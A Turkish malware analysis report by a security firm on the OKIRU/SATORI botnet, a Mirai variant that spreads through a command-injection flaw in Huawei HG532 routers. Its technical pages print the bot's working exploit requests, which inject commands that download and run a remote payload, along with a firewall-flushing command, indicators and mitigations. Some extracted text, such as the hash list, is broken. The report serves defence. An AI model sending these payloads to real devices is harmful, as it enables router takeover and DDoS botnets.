OKIRU/SATORI BOTU İNCELEMESİ

Transkript

1 OKIRU/SATORI BOTU İNCELEMESİ

2 Bilge SGT Bilge SGT, teknoloji entegrasyonu ve siber güvenlik alanında faaliyet göstermektedir. Özellikle kamu kurumları, finans kuruluşları ve kritik altyapılara yönelik hizmetler vermekte olan Bilge SGT, kurumların özel ihtiyaçları doğrultusunda uçtan uca teknoloji çözümleri sunmaktadır. Ağ teknolojileri, sunucu ve sistem çözümleri, güvenli veri depolama sistemleri, iletişim şifreleme, ağ trafiği optimizasyonu çözümleri sunabilen Bilge SGT, mevcut çözümleri özelleştirerek kurumların verimliliğini ve yönetim kabiliyetlerini arttırmayı hedeflemektedir. Bilge SOME Bilge SOME, kurumların siber güvenlik olayları anında ihtiyaç duydukları güvenilir uzman desteğini sağlamak için Bilge SGT tarafından kurulmuş siber güvenlik ekibidir. Sistemleriniz, iletişim altyapınız, uygulamalarınız saldırı altında olduğunda, bilgilerinizin sızdırılıp ifşaa edilme riski ile karşılaştığınızda; Bilge SOME acil müdahale ekibiyle size destek olmak ve kurumunuzu siber saldırılara karşı hazırlamak altyapınızı iyileştirir, teknik ekiplerinizi eğitir.

3 RAPOR HAKKINDA 30 Kasım 2017 tarihinde Huawei HG532 model yönlendirici modem cihazlarında keşfedilen güvenlik zafiyeti, teknik detayları paylaşılmamasına rağmen saldırı amaçlı kullanılmaya başlanmıştır. Raporda incelenen OKIRU/SATORI Bot u, 2016 yılı sonunda yayılmaya başlayan ve dünya genelinde birçok cihazı etkileyerek çok kuvvetli DDoS saldırılarına sebep olan Mirai Bot u temel alınarak geliştirilmiştir. Mirai botunda değişiklik yapılarak, Huawei cihazlardaki bu güvenlik açığını kullanıp zararlı yazılımın yayılmasını sağlayacak hale getirilmiş, yayılırken kullandığı dosya adı olan okiru dan yola çıkılarak ismi OKIRU/SATORI olarak tanımlanmıştır. Zararlı yazılımın kısa süre içerisinde Amerika Birleşik Devletleri, Orta ve Güney Amerika ülkeler, Kuzey Afrika ülkeleri, Japonya, Orta Avrupa ve Türkiye de etkili olduğu gözlemlenmiştir. OKIRU/SATORI nin atası olan Mirai Bot ağı kullanılarak çeşitli web sitelerine saldırılar gerçekleştirilmişti. İnternetin en büyük DNS hizmet sağlayıcılarından birisi olan DYN şirketine gerçekleştirilen saldırı Twitter, Spotify, Reddit, Paypal, Netflix gibi küresel bilinirliği olan hizmet ve içerik sağlayıcıların servislerini 2016 yılı sonu ve 2017 yılı başlarında kesintiye uğratmıştı. Analiz çalışmamızda OKIRU/SATORI Botunun binary dosyası üzerinden hızlı inceleme yaparak nasıl çalıştığı, nasıl yayıldığı ve ne tedbir alınması gerektiğini anlamaya yönelik teknik bir değerlendirme sunulmaktadır. Bilge SGT Sayfa 3 / 12

4 OKIRU/SATORI BOT NEDİR, NASIL YAYILIR OKIRU/SATORI solucanu, internete bağlı cihazları ve modemleri hedef alan Mirai Botunun varyantıdır. Zarrlı yazılım, baz aldığı Mirai nin kullandığı basit kullanıcı adı/parola ikilileri yerine Huawei HG532 model yönlendirici modem aygıtlarında yakın zamanda tespit edilmiş olan CVE kimlik numaralı güvenlik zafiyetini kullanarak enfekte olmakta ve yayılmaktadır. Zararlı yazılım yayılmak için Huawei HG532 model yönlendirici modem aygıtların TR- 064 protokolü implementasyonundaki yazılım hatasını kullanmaktadır. TCP/37215 ve TCP/52869 portunda hizmet veren UPnP (Universal Plag and Play) servisinin girdi doğrulamaları eksik veya hatalı yapması sonucu, komut (Shell) satırında çalıştırılabilen özel karakterler olan $( ) karakterleri isteklere enjekte edilebilmekte ve böylelikle cihazların komut satırında yönetici yetkileri ile komut çalıştırılabilmektedir. Komut satırında yapılacak işlemler, gerçekleştirilen istek içerisindeki NewStatusURL ve NewDownloadURL direktiflerinin içerisine enjekte edilmektedir. Bu sayede saldırgan sadece Mirati/Satori botunun URL ini hedef sisteme vererek botun cihaz tarafından indirilerek çalıştırılmasını sağlayabilmektedir. Enjekte ederek komut satırında busybox içerisinde çalıştırdığı komut şu şekildedir; busybox wget -g l /tmp/rsh -r /okiru.mips ;chmod +x /tmp/rsh ;/tmp/rsh Bilge SGT Sayfa 4 / 12

5 TEKNİK DETAYLAR Zararlı yazılımın farklı platformlara yayılmak için kullandığı binary dosyaların adları ve hash değerleri; Hash Değeri Binary Adı df9c48e8bc7e7371b4744a2ef8b83ddf a7922bce9bb0cf58f305d17ccbc78d98 37b7c de97c762dff7a1ba7b3f e1411cc1726afe6fb8d09099c5fb2fa6 cd4de0ae80a6f11bca8bec7b590e5832 7de55e697cd7e136dbb82b0713a f9cee3d50e8f651eabc6ba d36ad621e350f6fce7a48e598662b 8db c8fca5d4596a7a8f9931 0a8efeb4cb15c5b599e0d4fb9faba37d 08d48000a47af6f173eba6bb e9038f7f9c957a4e1c6fc add4 b okiru.mipsel okiru.arm7 okiru.x86 okiru.x86 okiru.mips okiru.m68k okiru.arm okiru.sparc okiru.powerpc okiru.x86_64 okiru.superh Zararlı yazılımın komuta kontrolü için kullanılan sunucuların IP adresli listesi C&C IP Adresleri (Güncel Sunucu) Bilge SGT Sayfa 5 / 12

6 Zararlı yazılımın binary dosyası incelendiğinde enfekte olduktan sonra cihaz üzerindeki güvenlik duvarı kurallarını kaldırmaktadır; iptables -F Yine incelemede enfekte olduğu sisteme uygun binary dosyanın wget ile indirildiğini ve indirme yerindeki tam dizini tespit etmek mümkündür; /bin/busybox wget -O -> %s; /bin/busybox chmod 777 %s;./%s; >%s OKIRU/SATORI nin diğer aygıtlara yayılmak için cihazlara gönderdiği HTTP isteklerinin detayları şu şekildedir; POST /picdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 603 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:wanipconnection:1#addportmapping Accept: */* User-Agent: Hello-World Connection: keep-alive Bilge SGT Sayfa 6 / 12

7 <?xml version="1.0"?><s:envelope xmlns:s=" s:encodingstyle=" pping xmlns:u="urn:schemas-upnporg:service:wanipconnection:1"><newremotehost></newremotehost><newexternalp ort>47450</newexternalport><newprotocol>tcp</newprotocol><newinternalport>443 82</NewInternalPort><NewInternalClient>`cd /var/;cp $SHELL c;>c`</newinternalclient><newenabled>1</newenabled><newportmappingdescription >syncthing</newportmappingdescription><newleaseduration>0</newleaseduration>< /u:addportmapping></s:body></s:envelope> POST /picdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 630 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:wanipconnection:1#addportmapping Accept: */* User-Agent: Hello-World Connection: keep-alive <?xml version="1.0"?><s:envelope xmlns:s=" s:encodingstyle=" pping xmlns:u="urn:schemas-upnporg:service:wanipconnection:1"><newremotehost></newremotehost><newexternalp ort>47450</newexternalport><newprotocol>tcp</newprotocol><newinternalport>443 82</NewInternalPort><NewInternalClient>`cd /var/;wget - O -> c` </NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>sync thing</newportmappingdescription><newleaseduration>0</newleaseduration></u:ad dportmapping></s:body></s:envelope> Bilge SGT Sayfa 7 / 12

8 POST /picdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 602 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:wanipconnection:1#addportmapping Accept: */* User-Agent: Hello-World Connection: keep-alive <?xml version="1.0"?><s:envelope xmlns:s=" s:encodingstyle=" pping xmlns:u="urn:schemas-upnporg:service:wanipconnection:1"><newremotehost></newremotehost><newexternalp ort>47450</newexternalport><newprotocol>tcp</newprotocol><newinternalport>443 82</NewInternalPort><NewInternalClient>`cd /var;chmod +x c;./c`</newinternalclient><newenabled>1</newenabled><newportmappingdescription >syncthing</newportmappingdescription><newleaseduration>0</newleaseduration>< /u:addportmapping></s:body></s:envelope> POST /ctrlt/deviceupgrade_1 HTTP/1.1 Host: %s:37215 User-Agent: Hello-World Content-Length: 430 Connection: keep-alive Accept: */* Accept-Encoding: gzip, deflate Bilge SGT Sayfa 8 / 12

9 Authorization: Digest username="dslf-config", realm="huaweihomegateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/deviceupgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="md5", qop="auth", nc= , cnonce="248d1a " <?xml version="1.0"?> <s:envelope xmlns:s=" s:encodingstyle=" <s:body><u:upgrade xmlns:u="urn:schemas-upnp-org:service:wanpppconnection:1"> <NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</newstatusurl> <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL> </u:upgrade> </s:body> </s:envelope> İndikatör olarak kullanılabilecek veriler şu şekildedir; İsteklerin hedef portu TCP/52869 veya TCP/37215 İstekler HTTP protokolü üzerinden ve SSL kullanılmadan SOAP istekleridir Isteklerin hedef dosyası /picdesc.xml veya /ctrlt/deviceupgrade_1 İsteklerin User-Agent değeri Hello-World İstek gövdesinde (request body) busybox wget veya chmod veya $SHELL dizileri bulunması Enfekte olan cihazlar komuta kontrol sunucusuna TCP/7645 portuna bağlanmaya çalışmaktadır. Dinamik analiz sistemlerini ve kum havuzlarını yanıltmak amacıyla ortam kontrollerini yaptıktan sonra :23 adresine bağlantı isteği gönderiyor gibi davranmaktadır. Bilge SGT Sayfa 9 / 12

10 SALDIRGAN HAKKINDA BİLGİ Saldırı gelmişmiş bir güvenlik zafiyeti tekniği kullanıyor olsa da, saldırganın internet üzerindeki güvenlik forumlarında Mirai Botu nu nasıl modifiye edebileceğini soran Nexus Zeta takma ismini kullanan amatör bir korsan olduğu tespit edilmiştir. Resim 1 HackForums da ARMv6b Derleyici Sorusu Resim 2 - "nexus_zeta" Twitter Hesabı Resim 3 - "NexusZeta" GitHub Hesabı Bilge SGT Sayfa 10 / 12

11 NASIL TEDBİR ALIRIM? Ağınıza doğru trafiklerde TCP/52869 ve TCP/37215 portlarına yönelik istekleri engelleyin. Ağınızdan dışarıya doğru komuta kontrol sunucusu listesinde verilen IP adreslerine doğru trafikleri engelleyin. Huawei HG532 model yönlendirici modem kullanıyorsanız üreticinizin yamalarını ve güncel firmware sürümünü modeminize yükleyin. Huawei HG532 model yönlendirici modem kullanıyorsanız cihaz üzerindeki güvenlik duvarından dışarıdan gelen TCP/52869 ve TCP/37215 portlarına yönelik istekleri engelleyin. Uzaktan yönetim arabirimlerini WAN ara yüzlerinden erişime mutlaka kapatın. Bilge SGT Sayfa 11 / 12

12 Kurumsal Siber Olaylara Müdahale Ekipleri (SOME) eğitimi ve siber güvenlik operasyon merkezi çalışmalarımız hakkında bilgi almak için bizlerle irtibata geçebilirsiniz. +90 (312) Bilge SGT Sayfa 12 / 12